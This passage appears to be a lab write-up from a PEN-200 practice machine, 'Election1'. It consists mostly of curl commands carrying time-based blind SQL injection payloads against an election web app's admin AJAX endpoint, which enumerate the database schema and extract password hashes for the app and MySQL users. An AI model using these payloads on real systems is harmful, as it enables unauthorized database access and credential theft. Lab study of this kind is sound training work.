└─$ sqli=$(echo '1 OR IF((SELECT COUNT(schema_name) FROM information_schema.schemata)=4, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"                 
{"code":"404"}
real	2.06s
user	0.00s
sys	0.00s
cpu	0%

Using the COUNT function, there are a total of 4 databases.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name LIKE "e%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="election"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

election DB, which is the current DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="information_schema"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The default information_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="performance_schema"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The default performance_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="mysql"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The default mysql DB.

election DB (Time-based Blind)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="election")=8, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

Using the COUNT function, there are a total of 8 tables within the election DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name LIKE "tb%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_panitia"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

election.tb_panitia table identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_pengaturan"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

election.tb_pengaturan table identified.

election.tb_panitia Table (Time-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia")=5, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"           
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

Using the COUNT function, there are a total of 5 columns within the election.tb_panitia table.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "passwo%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="password"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

election.tb_panitia.password column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "nam%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"    
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="nama"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

election.tb_panitia.nama column identified.

election.tb_panitia Credential Exfiltration (Time-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama LIKE "L%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"      
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

Love user identified in the election.tb_panitia.nama column.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND LENGTH(password)=32), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

The Love user's password hash is 32 characters long.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password LIKE "bb113886b0513a9d%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password="bb113886b0513a9d882e3caa5cd73314"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

Password hash of the Love user is bb113886b0513a9d882e3caa5cd73314. The password of the Love account was already disclosed in the card.php file.

mysql DB (Time-based Blind)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="mysql")=30, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

Using the COUNT function, there are a total of 30 tables within the mysql DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="mysql" AND table_name="user"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

The default mysql.user table.

mysql.user Table (Time-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user")=46, SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"       
{"code":"404"}
real	2.05s
user	0.00s
sys	0.00s
cpu	0%

Using the COUNT function, there are a total of 46 columns within the mysql.user table.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="user"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.00s
sys	0.00s
cpu	0%

mysql.user.user column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user" AND column_name="password"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE LENGTH(password)=41), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

mysql.user.password column identified; its value is 41 characters long.

mysql.user Credential Exfiltration (Time-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="root"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%

root user identified in the mysql.user.user column.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password LIKE "*9CFBBC772F3F6C%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password="*9CFBBC772F3F6C106020035386DA5BBBF1249A11"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.00s
sys	0.01s
cpu	0%

9CFBBC772F3F6C106020035386DA5BBBF1249A11 is the password hash of the root user. Note the leading * character: it is part of the stored value and marks the 41-character mysql_native_password hash format.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="newuser"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

newuser user identified in the mysql.user.user column.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password LIKE "*2470C0C06DEE42FD16%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password="*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.00s
sys	0.01s
cpu	0%

2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 is the password hash of the newuser user. Password cracked.